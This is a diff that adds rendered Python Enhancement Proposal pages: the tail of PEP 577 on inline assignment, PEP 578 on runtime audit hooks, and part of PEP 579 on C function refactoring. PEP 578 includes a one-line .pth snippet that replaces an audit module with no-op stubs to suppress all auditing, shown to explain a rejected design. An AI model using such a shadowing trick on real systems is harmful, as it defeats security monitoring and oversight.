Each of the available options hides some aspect of the intended loop structure +inside the loop body, whether that’s the state modification, the exit condition, +or both.

+

The proposal in this PEP allows both the state modification and the exit +condition to be included directly in the loop header:

+
attempts = 0
+while (attempts += 1) <= MAX_ATTEMPTS:
+    try:
+        result = attempt_operation()
+    except Exception as exc:
+        continue # Failed, so try again
+    log.debug(f"Succeeded after {attempts} attempts")
+    break # Success!
+else:
+    raise OperationFailed(f"Failed after {MAX_ATTEMPTS} attempts") from exc
+
+
+
+
+

Simplifying if-elif chains

+

if-elif chains that need to rebind the checked condition currently need to +be written using nested if-else statements:

+
m = pattern.match(data)
+if m:
+    ...
+else:
+    m = other_pattern.match(data)
+    if m:
+        ...
+    else:
+        m = yet_another_pattern.match(data)
+        if m:
+            ...
+        else:
+            ...
+
+
+

As with PEP 572, this PEP allows the else/if portions of that chain to be +condensed, making their consistent and mutually exclusive structure more +readily apparent:

+
m = pattern.match(data)
+if m:
+    ...
+elif m := other_pattern.match(data):
+    ...
+elif m := yet_another_pattern.match(data):
+    ...
+else:
+    ...
+
+
+

Unlike PEP 572, this PEP requires that the assignment target be explicitly +indicated as local before the first use as a := target, either by +binding it to a value (as shown above), or else by including an appropriate +explicit type declaration:

+
m: typing.re.Match
+if m := pattern.match(data):
+    ...
+elif m := other_pattern.match(data):
+    ...
+elif m := yet_another_pattern.match(data):
+    ...
+else:
+    ...
+
+
+
+
+

Capturing intermediate values from comprehensions

+

The proposal in this PEP makes it straightforward to capture and reuse +intermediate values in comprehensions and generator expressions by +exporting them to the containing block scope:

+
factor: int
+while any(n % (factor := p) == 0 for p in small_primes):
+    n //= factor
+
+total = 0
+partial_sums = [total += value for value in data]
+
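+
For comparison, the := spelling of the partial sums pattern (as ultimately accepted via PEP 572) already behaves this way on Python 3.8+:

+
>>> data = range(5)
+>>> total = 0
+>>> partial_sums = [total := total + value for value in data]
+>>> partial_sums
+[0, 1, 3, 6, 10]
+>>> total
+10
+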
+
+
+
+

Allowing lambda expressions to act more like re-usable code thunks

+

This PEP allows the classic closure usage example:

+
def make_counter(start=0):
+    x = start
+    def counter(step=1):
+        nonlocal x
+        x += step
+        return x
+    return counter
+
+
+

To be abbreviated as:

+
def make_counter(start=0):
+    x = start
+    return lambda step=1: x += step
+
+
+

While the latter form is still a conceptually dense piece of code, it can be +reasonably argued that the lack of boilerplate (where the “def”, “nonlocal”, +and “return” keywords and two additional repetitions of the “x” variable name +have been replaced with the “lambda” keyword) may make it easier to read in +practice.

+
+
+
+

Relationship with PEP 572

+

The case for allowing inline assignments at all is made in PEP 572. This +competing PEP was initially going to propose an alternate surface syntax +(EXPR given NAME = EXPR), while retaining the expression semantics from +PEP 572, but that changed when discussing one of the initial motivating use +cases for allowing embedded assignments at all: making it possible to easily +calculate cumulative sums in comprehensions and generator expressions.

+

As a result of that, and unlike PEP 572, this PEP focuses primarily on use +cases for inline augmented assignment. It also has the effect of converting +cases that currently inevitably raise UnboundLocalError at function call +time to report a new compile time TargetNameError.

+

New syntax for a name rebinding expression (NAME := EXPR) is then added not only to handle the same use cases as are identified in PEP 572, but also as a lower level primitive to help illustrate, implement and explain the new augmented assignment semantics, rather than being the sole change being proposed.

+

The author of this PEP believes that this approach makes the value of the new +flexibility in name rebinding clearer, while also mitigating many of the +potential concerns raised with PEP 572 around explaining when to use +NAME = EXPR over NAME := EXPR (and vice-versa), without resorting to +prohibiting the bare statement form of NAME := EXPR outright (such +that NAME := EXPR is a compile error, but (NAME := EXPR) is permitted).

+
+
+

Acknowledgements

+

The PEP author wishes to thank Chris Angelico for his work on PEP 572, and his +efforts to create a coherent summary of the great many sprawling discussions +that spawned on both python-ideas and python-dev, as well as Tim Peters for +the in-depth discussion of parent local scoping that prompted the above +scoping proposal for augmented assignments inside scoped expressions.

+

Eric Snow’s feedback on a pre-release version of this PEP helped make it +significantly more readable.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0577.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0578/index.html b/pep-0578/index.html new file mode 100644 index 00000000000..f5b8e09b07c --- /dev/null +++ b/pep-0578/index.html @@ -0,0 +1,755 @@ + + + + + + + + PEP 578 – Python Runtime Audit Hooks | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 578 – Python Runtime Audit Hooks

+
+
Author:
+
Steve Dower <steve.dower at python.org>
+
BDFL-Delegate:
+
Christian Heimes <christian at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
16-Jun-2018
+
Python-Version:
+
3.8
+
Post-History:
+
28-Mar-2019, 07-May-2019
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Audit events table.

+


+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP describes additions to the Python API and specific behaviors +for the CPython implementation that make actions taken by the Python +runtime visible to auditing tools. Visibility into these actions +provides opportunities for test frameworks, logging frameworks, and +security tools to monitor and optionally limit actions taken by the +runtime.

+

This PEP proposes adding two APIs to provide insights into a running +Python application: one for arbitrary events, and another specific to +the module import system. The APIs are intended to be available in all +Python implementations, though the specific messages and values used +are unspecified here to allow implementations the freedom to determine +how best to provide information to their users. Some examples likely +to be used in CPython are provided for explanatory purposes.

+

See PEP 551 for discussion and recommendations on enhancing the +security of a Python runtime making use of these auditing APIs.

+
+
+

Background

+

Python provides access to a wide range of low-level functionality on +many common operating systems. While this is incredibly useful for +“write-once, run-anywhere” scripting, it also makes monitoring of +software written in Python difficult. Because Python uses native system +APIs directly, existing monitoring tools either suffer from limited +context or auditing bypass.

+

Limited context occurs when system monitoring can report that an +action occurred, but cannot explain the sequence of events leading to +it. For example, network monitoring at the OS level may be able to +report “listening started on port 5678”, but may not be able to +provide the process ID, command line, parent process, or the local +state in the program at the point that triggered the action. Firewall +controls to prevent such an action are similarly limited, typically +to process names or some global state such as the current user, and +in any case rarely provide a useful log file correlated with other +application messages.

+

Auditing bypass can occur when the typical system tool used for an +action would ordinarily report its use, but accessing the APIs via +Python do not trigger this. For example, invoking “curl” to make HTTP +requests may be specifically monitored in an audited system, but +Python’s “urlretrieve” function is not.

+

Within a long-running Python application, particularly one that +processes user-provided information such as a web app, there is a risk +of unexpected behavior. This may be due to bugs in the code, or +deliberately induced by a malicious user. In both cases, normal +application logging may be bypassed resulting in no indication that +anything out of the ordinary has occurred.

+

Additionally, and somewhat unique to Python, it is very easy to affect +the code that is run in an application by manipulating either the +import system’s search path or placing files earlier on the path than +intended. This is often seen when developers create a script with the +same name as the module they intend to use - for example, a +random.py file that attempts to import the standard library +random module.

+

This is not sandboxing, as this proposal does not attempt to prevent +malicious behavior (though it enables some new options to do so). +See the Why Not A Sandbox section below for further discussion.

+
+
+

Overview of Changes

+

The aim of these changes is to enable both application developers and +system administrators to integrate Python into their existing +monitoring systems without dictating how those systems look or behave.

+

We propose two API changes to enable this: an Audit Hook and Verified +Open Hook. Both are available from Python and native code, allowing +applications and frameworks written in pure Python code to take +advantage of the extra messages, while also allowing embedders or +system administrators to deploy builds of Python where auditing is +always enabled.

+

Only CPython is bound to provide the native APIs as described here. +Other implementations should provide the pure Python APIs, and +may provide native versions as appropriate for their underlying +runtimes. Auditing events are likewise considered implementation +specific, but are bound by normal feature compatibility guarantees.

+
+

Audit Hook

+

In order to observe actions taken by the runtime (on behalf of the +caller), an API is required to raise messages from within certain +operations. These operations are typically deep within the Python +runtime or standard library, such as dynamic code compilation, module +imports, DNS resolution, or use of certain modules such as ctypes.

+

The following new C APIs allow embedders and CPython implementors to +send and receive audit hook messages:

+
/* Add an auditing hook */
+typedef int (*hook_func)(const char *event, PyObject *args,
+                         void *userData);
+int PySys_AddAuditHook(hook_func hook, void *userData);
+
+/* Raise an event with all auditing hooks */
+int PySys_Audit(const char *event, PyObject *args);
+
+
+

The new Python APIs for receiving and raising audit hooks are:

+
# Add an auditing hook
+sys.addaudithook(hook: Callable[[str, tuple], None])
+
+# Raise an event with all auditing hooks
+sys.audit(str, *args)
+
+
+

Hooks are added by calling PySys_AddAuditHook() from C at any time, +including before Py_Initialize(), or by calling +sys.addaudithook() from Python code. Hooks cannot be removed or +replaced. For CPython, hooks added from C are global, while hooks added +from Python are only for the current interpreter. Global hooks are +executed before interpreter hooks.
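+
A minimal runnable sketch of the Python-level API (the myapp.* event name is illustrative; remember that hooks cannot be removed once added):

+
import sys
+
+def hook(event, args):
+    # Filter to our own events; CPython raises many built-in events too.
+    if event.startswith("myapp."):
+        print("audit:", event, args)
+
+sys.addaudithook(hook)
+sys.audit("myapp.event", "some", "context")
+# -> audit: myapp.event ('some', 'context')
+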

+

When events of interest are occurring, code can either call +PySys_Audit() from C (while the GIL is held) or sys.audit(). The +string argument is the name of the event, and the tuple contains +arguments. A given event name should have a fixed schema for arguments, +which should be considered a public API (for each x.y version release), +and thus should only change between feature releases with updated +documentation. To minimize overhead and simplify handling in native code +hook implementations, named arguments are not supported.

+

For maximum compatibility, events using the same name as an event in +the reference interpreter CPython should make every attempt to use +compatible arguments. Including the name or an abbreviation of the +implementation in implementation-specific event names will also help +prevent collisions. For example, a pypy.jit_invoked event is clearly +distinguished from an ipy.jit_invoked event. Events raised from +Python modules should include their module or package name in the event +name.

+

While event names may be arbitrary UTF-8 strings, for consistency across +implementations it is recommended to use valid Python dotted names and +avoid encoding specific details in the name. For example, an import +event with the module name spam as an argument is preferable to a +spam module imported event with no arguments. Avoid using embedded +null characters or you may upset those who implement hooks using C.

+

When an event is audited, each hook is called in the order it was added +(as much as is possible), passing the event name and arguments. If any +hook returns with an exception set, later hooks are ignored and in +general the Python runtime should terminate - exceptions from hooks are +not intended to be handled or treated as expected occurrences. This +allows hook implementations to decide how to respond to any particular +event. The typical responses will be to log the event, abort the +operation with an exception, or to immediately terminate the process with +an operating system exit call.

+

When an event is audited but no hooks have been set, the audit() +function should impose minimal overhead. Ideally, each argument is a +reference to existing data rather than a value calculated just for the +auditing call.

+

As hooks may be Python objects, they need to be freed during interpreter or runtime finalization. These should not be triggered at any other time, and should raise an audit event to ensure that any unexpected calls are observed.

+

Below in Suggested Audit Hook Locations, we recommend some important +operations that should raise audit events. In general, events should be +raised at the lowest possible level. Given the choice between raising an +event from Python code or native code, raising from native code should be +preferred.

+

Python implementations should document which operations will raise +audit events, along with the event schema. It is intentional that +sys.addaudithook(print) is a trivial way to display all messages.

+
+
+

Verified Open Hook

+

Most operating systems have a mechanism to distinguish between files +that can be executed and those that can not. For example, this may be an +execute bit in the permissions field, a verified hash of the file +contents to detect potential code tampering, or file system path +restrictions. These are an important security mechanism for ensuring +that only code that has been approved for a given environment is +executed.

+

Most kernels offer ways to restrict or audit binaries loaded and executed +by the kernel. File types owned by Python appear as regular data and +these features do not apply. This open hook allows Python embedders to +integrate with operating system support when launching scripts or +importing Python code.

+

The new public C API for the verified open hook is:

+
/* Set the handler */
+typedef PyObject *(*hook_func)(PyObject *path, void *userData);
+int PyFile_SetOpenCodeHook(hook_func handler, void *userData);
+
+/* Open a file using the handler */
+PyObject *PyFile_OpenCode(const char *path);
+
+
+

The new public Python API for the verified open hook is:

+
# Open a file using the handler
+io.open_code(path : str) -> io.IOBase
+
+
+

The io.open_code() function is a drop-in replacement for +open(abspath(str(pathlike)), 'rb'). Its default behaviour is to +open a file for raw, binary access. To change the behaviour a new +handler should be set. Handler functions only accept str arguments. +The C API PyFile_OpenCode function assumes UTF-8 encoding. Paths +must be absolute, and it is the responsibility of the caller to ensure +the full path is correctly resolved.
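+
A short usage sketch of the default behaviour (the file name is illustrative; as noted above, the caller resolves the absolute path):

+
import io
+import os
+
+path = os.path.abspath("spam.py")  # caller must supply an absolute path
+with io.open_code(path) as f:      # default behaviour: open(path, 'rb')
+    source_bytes = f.read()
+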

+

A custom handler may be set by calling PyFile_SetOpenCodeHook() from +C at any time, including before Py_Initialize(). However, if a hook +has already been set then the call will fail. When open_code() is +called with a hook set, the hook will be passed the path and its return +value will be returned directly. The returned object should be an open +file-like object that supports reading raw bytes. This is explicitly +intended to allow a BytesIO instance if the open handler has already +read the entire file into memory.

+

Note that these hooks can import and call the _io.open() function on +CPython without triggering themselves. They can also use _io.BytesIO +to return a compatible result using an in-memory buffer.

+

If the hook determines that the file should not be loaded, it should +raise an exception of its choice, as well as performing any other +logging.

+

All import and execution functionality involving code from a file will +be changed to use open_code() unconditionally. It is important to +note that calls to compile(), exec() and eval() do not go +through this function - an audit hook that includes the code from these +calls is the best opportunity to validate code that is read from the +file. Given the current decoupling between import and execution in +Python, most imported code will go through both open_code() and the +log hook for compile, and so care should be taken to avoid +repeating verification steps.

+

File accesses that are not intentionally planning to execute code are +not expected to use this function. This includes loading pickles, XML +or YAML files, where code execution is generally considered malicious +rather than intentional. These operations should provide their own +auditing events, preferably distinguishing between normal functionality +(for example, Unpickler.load) and code execution +(Unpickler.find_class).

+

A few examples: if the file type normally requires an execute bit (on +POSIX) or would warn when marked as having been downloaded from the +internet (on Windows), it should probably use open_code() rather +than plain open(). Opening ZIP files using the ZipFile class +should use open(), while opening them via zipimport should use +open_code() to signal the correct intent. Code that uses the wrong +function for a particular context may bypass the hook, which in CPython +and the standard library should be considered a bug. Using a combination +of open_code hooks and auditing hooks is necessary to trace all +executed sources in the presence of arbitrary code.

+

There is no Python API provided for changing the open hook. To modify +import behavior from Python code, use the existing functionality +provided by importlib.

+
+
+

API Availability

+

While all the functions added here are considered public and stable API, +the behavior of the functions is implementation specific. Most +descriptions here refer to the CPython implementation, and while other +implementations should provide the functions, there is no requirement +that they behave the same.

+

For example, sys.addaudithook() and sys.audit() should exist but +may do nothing. This allows code to make calls to sys.audit() +without having to test for existence, but it should not assume that its +call will have any effect. (Including existence tests in +security-critical code allows another vector to bypass auditing, so it +is preferable that the function always exist.)

+

io.open_code(path) should at a minimum always return +_io.open(path, 'rb'). Code using the function should make no further +assumptions about what may occur, and implementations other than CPython +are not required to let developers override the behavior of this +function with a hook.

+
+
+
+

Suggested Audit Hook Locations

+

The locations and parameters in calls to sys.audit() or +PySys_Audit() are to be determined by individual Python +implementations. This is to allow maximum freedom for implementations +to expose the operations that are most relevant to their platform, +and to avoid or ignore potentially expensive or noisy events.

+

Table 1 acts as both suggestions of operations that should trigger +audit events on all implementations, and examples of event schemas.

+

Table 2 provides further examples that are not required, but are +likely to be available in CPython.

+

Refer to the documentation associated with your version of Python to +see which operations provide audit events.

Table 1: Suggested Audit Hooks

API Function | Event Name | Arguments | Rationale
PySys_AddAuditHook | sys.addaudithook | (none) | Detect when new audit hooks are being added.
PyFile_SetOpenCodeHook | cpython.PyFile_SetOpenCodeHook | (none) | Detects any attempt to set the open_code hook.
compile, exec, eval, PyAst_CompileString, PyAST_obj2mod | compile | (code, filename_or_none) | Detect dynamic code compilation, where code could be a string or AST. Note that this will be called for regular imports of source code, including those that were opened with open_code.
exec, eval, run_mod | exec | (code_object,) | Detect dynamic execution of code objects. This only occurs for explicit calls, and is not raised for normal function invocation.
import | import | (module, filename, sys.path, sys.meta_path, sys.path_hooks) | Detect when modules are imported. This is raised before the module name is resolved to a file. All arguments other than the module name may be None if they are not used or available.
open | io.open | (path, mode, flags) | Detect when a file is about to be opened. path and mode are the usual parameters to open if available, while flags is provided instead of mode in some cases.
PyEval_SetProfile | sys.setprofile | (none) | Detect when code is injecting trace functions. Because of the implementation, exceptions raised from the hook will abort the operation, but will not be raised in Python code. Note that threading.setprofile eventually calls this function, so the event will be audited for each thread.
PyEval_SetTrace | sys.settrace | (none) | Detect when code is injecting trace functions. Because of the implementation, exceptions raised from the hook will abort the operation, but will not be raised in Python code. Note that threading.settrace eventually calls this function, so the event will be audited for each thread.
_PyObject_GenericSetAttr, check_set_special_type_attr, object_set_class, func_set_code, func_set_[kw]defaults | object.__setattr__ | (object, attr, value) | Detect monkey patching of types and objects. This event is raised for the __class__ attribute and any attribute on type objects.
_PyObject_GenericSetAttr | object.__delattr__ | (object, attr) | Detect deletion of object attributes. This event is raised for any attribute on type objects.
Unpickler.find_class | pickle.find_class | (module_name, global_name) | Detect imports and global name lookup when unpickling.
Table 2: Potential CPython Audit Hooks

API Function | Event Name | Arguments | Rationale
_PySys_ClearAuditHooks | sys._clearaudithooks | | Notifies hooks they are being cleaned up, mainly in case the event is triggered unexpectedly. This event cannot be aborted.
code_new | code.__new__ | (bytecode, filename, name) | Detect dynamic creation of code objects. This only occurs for direct instantiation, and is not raised for normal compilation.
func_new_impl | function.__new__ | (code,) | Detect dynamic creation of function objects. This only occurs for direct instantiation, and is not raised for normal compilation.
_ctypes.dlopen, _ctypes.LoadLibrary | ctypes.dlopen | (module_or_path,) | Detect when native modules are used.
_ctypes._FuncPtr | ctypes.dlsym | (lib_object, name) | Collect information about specific symbols retrieved from native modules.
_ctypes._CData | ctypes.cdata | (ptr_as_int,) | Detect when code is accessing arbitrary memory using ctypes.
new_mmap_object | mmap.__new__ | (fileno, map_size, access, offset) | Detects creation of mmap objects. On POSIX, access may have been calculated from the prot and flags arguments.
sys._getframe | sys._getframe | (frame_object,) | Detect when code is accessing frames directly.
sys._current_frames | sys._current_frames | | Detect when code is accessing frames directly.
socket.bind, socket.connect, socket.connect_ex, socket.getaddrinfo, socket.getnameinfo, socket.sendmsg, socket.sendto | socket.address | (socket, address,) | Detect access to network resources. The address is unmodified from the original call.
member_get, func_get_code, func_get_[kw]defaults | object.__getattr__ | (object, attr) | Detect access to restricted attributes. This event is raised for any built-in members that are marked as restricted, and members that may allow bypassing imports.
urllib.urlopen | urllib.Request | (url, data, headers, method) | Detects URL requests.
+
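As a sketch of how the events in these tables might be consumed, the following hook aborts one specific operation by raising an exception, which is the PEP's mechanism for preventing an audited action (the blocked module name is an arbitrary example):

import sys

def block_ctypes(event, args):
    # Per Table 1, the "import" event's first argument is the module name.
    if event == "import" and args[0] == "ctypes":
        raise RuntimeError("import of ctypes is blocked by policy")

sys.addaudithook(block_ctypes)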
+
+

Performance Impact

+

The important performance impact is the case where events are being raised but there are no hooks attached. This is the unavoidable case: once a developer has added audit hooks, they have explicitly chosen to trade performance for functionality. The performance impact with hooks added is not of interest here, since this is opt-in functionality.

+

Analysis using the Python Performance Benchmark Suite [1] shows no significant impact, with the vast majority of benchmarks showing between 1.05x faster and 1.05x slower.

+
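A rough way to observe the no-hook overhead directly (a sketch; the event name is arbitrary and the absolute numbers depend on the machine):

import timeit

# With no hooks attached, sys.audit should return almost immediately.
print(timeit.timeit("sys.audit('example.event')",
                    setup="import sys", number=1_000_000))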

In our opinion, the performance impact of the set of auditing points +described in this PEP is negligible.

+
+
+

Rejected Ideas

+
+

Separate module for audit hooks

+

The proposal is to add a new module for audit hooks, hypothetically +audit. This would separate the API and implementation from the +sys module, and allow naming the C functions PyAudit_AddHook and +PyAudit_Audit rather than the current variations.

+

Any such module would need to be a built-in module that is guaranteed to +always be present. The nature of these hooks is that they must be +callable without condition, as any conditional imports or calls provide +opportunities to intercept and suppress or modify events.

+

Given it is one of the most core modules, the sys module is somewhat +protected against module shadowing attacks. Replacing sys with a +sufficiently functional module that the application can still run is a +much more complicated task than replacing a module with only one +function of interest. An attacker that has the ability to shadow the +sys module is already capable of running arbitrary code from files, +whereas an audit module could be replaced with a single line in a +.pth file anywhere on the search path:

+
import sys; sys.modules['audit'] = type('audit', (object,),
+    {'audit': lambda *a: None, 'addhook': lambda *a: None})
+
+
+

Multiple layers of protection already exist for monkey patching attacks +against either sys or audit, but assignments or insertions to +sys.modules are not audited.

+

This idea is rejected because it makes it trivial to suppress all calls +to audit.

+
+
+

Flag in sys.flags to indicate “audited” mode

+

The proposal is to add a value in sys.flags to indicate when Python +is running in a “secure” or “audited” mode. This would allow +applications to detect when some features are enabled or when hooks +have been added and modify their behaviour appropriately.

+

Currently, we are not aware of any legitimate reasons for a program to +behave differently in the presence of audit hooks.

+

Both application-level APIs sys.audit and io.open_code are +always present and functional, regardless of whether the regular +python entry point or some alternative entry point is used. Callers +cannot determine whether any hooks have been added (except by performing +side-channel analysis), nor do they need to. The calls should be fast +enough that callers do not need to avoid them, and the program is +responsible for ensuring that any added hooks are fast enough to not +affect application performance.

+

The argument that this is “security by obscurity” is valid, but +irrelevant. Security by obscurity is only an issue when there are no +other protective mechanisms; obscurity as the first step in avoiding +attack is strongly recommended (see this article for +discussion).

+

This idea is rejected because there are no appropriate reasons for an +application to change its behaviour based on whether these APIs are in +use.

+
+
+
+

Why Not A Sandbox

+

Sandboxing CPython has been attempted many times in the past, and each past attempt has failed. Fundamentally, the problem is that certain functionality has to be restricted when executing the sandboxed code, but otherwise needs to be available for normal operation of Python. For example, completely removing the ability to compile strings into bytecode also breaks the ability to import modules from source code, and if it is not completely removed then there are too many ways to get access to that functionality indirectly. There is not yet any feasible way to generically determine whether a given operation is “safe” or not. Further information and references are available at [2].

+

This proposal does not attempt to restrict functionality, but simply exposes the fact that the functionality is being used. Particularly for intrusion scenarios, detection is significantly more important than early prevention (as early prevention will generally drive attackers to use an alternate, less-detectable approach). The availability of audit hooks alone does not change the attack surface of Python in any way, but it enables defenders to integrate Python into their environment in ways that are currently not possible.

+

Since audit hooks have the ability to safely prevent an operation from occurring, this feature does enable some level of sandboxing. In most cases, however, the intention is to enable logging rather than to create a sandbox.

+
+
+

Relationship to PEP 551

+

This API was originally presented as part of +PEP 551 Security +Transparency in the Python Runtime.

+

For simpler review purposes, and due to the broader applicability of +these APIs beyond security, the API design is now presented separately.

+

PEP 551 is an informational PEP discussing how to integrate Python into +a secure or audited environment.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0578.rst

+

Last modified: 2024-06-03 14:51:21 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0579/index.html b/pep-0579/index.html
new file mode 100644
index 00000000000..f835f4b267c
--- /dev/null
+++ b/pep-0579/index.html
@@ -0,0 +1,549 @@
+PEP 579 – Refactoring C functions and methods | peps.python.org
+
+


+ + +
+
+
+

PEP 579 – Refactoring C functions and methods

+
+
Author:
+
Jeroen Demeyer <J.Demeyer at UGent.be>
+
BDFL-Delegate:
+
Petr Viktorin
+
Status:
+
Final
+
Type:
+
Informational
+
Created:
+
04-Jun-2018
+
Post-History:
+
20-Jun-2018
+
+
+
+
+
+

Approval Notice

+

This PEP describes design issues addressed in PEP 575, PEP 580, PEP 590 +(and possibly later proposals).

+

As noted in PEP 1:

+
+
Informational PEPs do not necessarily represent a Python community +consensus or recommendation, so users and implementers are free to +ignore Informational PEPs or follow their advice.
+

While there is no consensus on whether the issues or the solutions in +this PEP are valid, the list is still useful to guide further design.

+
+
+

Abstract

+

This meta-PEP collects various issues with CPython’s existing implementation +of built-in functions (functions implemented in C) and methods.

+

Fixing all these issues is too much for one PEP, +so that will be delegated to other standards track PEPs. +However, this PEP does give some brief ideas of possible fixes. +This is mainly meant to coordinate an overall strategy. +For example, a proposed solution may sound too complicated +for fixing any one single issue, but it may be the best overall +solution for multiple issues.

+

This PEP is purely informational: +it does not imply that all issues will eventually +be fixed, nor that they will be fixed using the solution proposed here.

+

It also serves as a check-list of possible requested features +to verify that a given fix does not make those +other features harder to implement.

+

The major proposed change is replacing PyMethodDef +by a new structure PyCCallDef +which collects everything needed for calling the function/method. +In the PyTypeObject structure, a new field tp_ccalloffset +is added giving an offset to a PyCCallDef * in the object structure.

+

NOTE: This PEP deals only with CPython implementation details; it does not affect the Python language or standard library.

+
+
+

Issues

+

This lists various issues with built-in functions and methods, +together with a plan for a solution and (if applicable) +pointers to standards track PEPs discussing the details.

+
+

1. Naming

+

The word “built-in” is overused in Python. +From a quick skim of the Python documentation, it mostly refers +to things from the builtins module. +In other words: things which are available in the global namespace +without a need for importing them. +This conflicts with the use of the word “built-in” to mean “implemented in C”.

+

Solution: since the C structure for built-in functions and methods is already +called PyCFunctionObject, +let’s use the name “cfunction” and “cmethod” instead of “built-in function” +and “built-in method”.

+
+
+

2. Not extendable

+

The various classes involved (such as builtin_function_or_method) +cannot be subclassed:

+
>>> from types import BuiltinFunctionType
+>>> class X(BuiltinFunctionType):
+...     pass
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: type 'builtin_function_or_method' is not an acceptable base type
+
+
+

This is a problem because it makes it impossible to add features +such as introspection support to these classes.

+

If one wants to implement a function in C with additional functionality, +an entirely new class must be implemented from scratch. +The problem with this is that the existing classes like +builtin_function_or_method are special-cased in the Python interpreter +to allow faster calling (for example, by using METH_FASTCALL). +It is currently impossible to have a custom class with the same optimizations.

+

Solution: make the existing optimizations available to arbitrary classes. +This is done by adding a new PyTypeObject field tp_ccalloffset +(or can we re-use tp_print for that?) +specifying the offset of a PyCCallDef pointer. +This is a new structure holding all information needed to call +a cfunction and it would be used instead of PyMethodDef. +This implements the new “C call” protocol.

+

For constructing cfunctions and cmethods, PyMethodDef arrays +will still be used (for example, in tp_methods) but that will +be the only remaining purpose of the PyMethodDef structure.

+

Additionally, we can also make some function classes subclassable. +However, this seems less important once we have tp_ccalloffset.

+

Reference: PEP 580

+
+
+

3. cfunctions do not become methods

+

A cfunction like repr does not implement __get__ to bind +as a method:

+
>>> class X:
+...     meth = repr
+>>> x = X()
+>>> x.meth()
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: repr() takes exactly one argument (0 given)
+
+
+

In this example, one would have expected that x.meth() returns +repr(x) by applying the normal rules of methods.

+

This is surprising and a needless difference between cfunctions and Python functions. For the standard built-in functions, this is not really a problem since those are not meant to be used as methods. But it does become a problem when one wants to implement a new cfunction with the goal of being usable as a method.

+

Again, a solution could be to create a new class behaving just +like cfunctions but which bind as methods. +However, that would lose some existing optimizations for methods, +such as the LOAD_METHOD/CALL_METHOD opcodes.

+

Solution: the same as the previous issue. +It just shows that handling self and __get__ +should be part of the new C call protocol.

+

For backwards compatibility, we would keep the existing non-binding +behavior of cfunctions. We would just allow it in custom classes.

+

Reference: PEP 580

+
+
+

4. Semantics of inspect.isfunction

+

Currently, inspect.isfunction returns True only for instances +of types.FunctionType. +That is, true Python functions.

+

A common use case for inspect.isfunction is checking for introspection support: it guarantees, for example, that inspect.getfile() will work. Ideally, it should be possible for other classes to be treated as functions too.

+

Solution: introduce a new InspectFunction abstract base class +and use that to implement inspect.isfunction. +Alternatively, use duck typing for inspect.isfunction +(as proposed in [2]):

+
def isfunction(obj):
+    return hasattr(type(obj), "__code__")
+
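A short sketch contrasting the two checks (CPython behaviour; builtin functions such as len do not expose __code__ on their type):

import inspect

def isfunction_ducktyped(obj):
    return hasattr(type(obj), "__code__")

def f():
    pass

print(inspect.isfunction(f))      # True: f is a types.FunctionType
print(inspect.isfunction(len))    # False: len is a cfunction
print(isfunction_ducktyped(f))    # True
print(isfunction_ducktyped(len))  # False: no __code__ on the type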
+
+
+
+

5. C functions should have access to the function object

+

The underlying C function of a cfunction currently +takes a self argument (for bound methods) +and then possibly a number of arguments. +There is no way for the C function to actually access the Python +cfunction object (the self in __call__ or tp_call). +This would for example allow implementing the +C call protocol for Python functions (types.FunctionType): +the C function which implements calling Python functions +needs access to the __code__ attribute of the function.

+

This is also needed for PEP 573 +where all cfunctions require access to their “parent” +(the module for functions of a module or the defining class +for methods).

+

Solution: add a new PyMethodDef flag to specify +that the C function takes an additional argument (as first argument), +namely the function object.

+

References: PEP 580, PEP 573

+
+
+

6. METH_FASTCALL is private and undocumented

+

The METH_FASTCALL mechanism allows calling cfunctions and cmethods +using a C array of Python objects instead of a tuple. +This was introduced in Python 3.6 for positional arguments only +and extended in Python 3.7 with support for keyword arguments.

+

However, given that it is undocumented, +it is presumably only supposed to be used by CPython itself.

+

Solution: since this is an important optimization, +everybody should be encouraged to use it. +Now that the implementation of METH_FASTCALL is stable, document it!

+

As part of the C call protocol, we should also add a C API function

+
PyObject *PyCCall_FastCall(PyObject *func, PyObject *const *args, Py_ssize_t nargs, PyObject *keywords)
+
+
+

Reference: PEP 580

+
+
+

7. Allowing native C arguments

+

A cfunction always takes its arguments as Python objects +(say, an array of PyObject pointers). +In cases where the cfunction is really wrapping a native C function +(for example, coming from ctypes or some compiler like Cython), +this is inefficient: calls from C code to C code are forced to use +Python objects to pass arguments.

+

Analogous to the buffer protocol which allows access to C data, +we should also allow access to the underlying C callable.

+

Solution: when wrapping a C function with native arguments +(for example, a C long) inside a cfunction, +we should also store a function pointer to the underlying C function, +together with its C signature.

+

Argument Clinic could automatically do this by storing +a pointer to the “impl” function.

+
+
+

8. Complexity

+

A huge number of classes are involved in implementing all the variations of methods. This is not a problem by itself, but it compounds the other issues listed here.

+

For ordinary Python classes, the table below gives the classes +for various kinds of methods. +The columns refer to the class in the class __dict__, +the class for unbound methods (bound to the class) +and the class for bound methods (bound to the instance):

kind | __dict__ | unbound | bound
Normal method | function | function | method
Static method | staticmethod | function | function
Class method | classmethod | method | method
Slot method | function | function | method
+

This is the analogous table for extension types (C classes):

kind | __dict__ | unbound | bound
Normal method | method_descriptor | method_descriptor | builtin_function_or_method
Static method | staticmethod | builtin_function_or_method | builtin_function_or_method
Class method | classmethod_descriptor | builtin_function_or_method | builtin_function_or_method
Slot method | wrapper_descriptor | wrapper_descriptor | method-wrapper
+
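The class names in the second table can be checked from the interpreter; a small sketch (CPython-specific names):

# Normal method of an extension type (list.append):
print(type(list.__dict__["append"]))   # <class 'method_descriptor'>
print(type(list.append))               # unbound: method_descriptor
print(type([].append))                 # bound: builtin_function_or_method

# Slot method (list.__len__):
print(type(list.__dict__["__len__"]))  # <class 'wrapper_descriptor'>
print(type([].__len__))                # bound: method-wrapper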

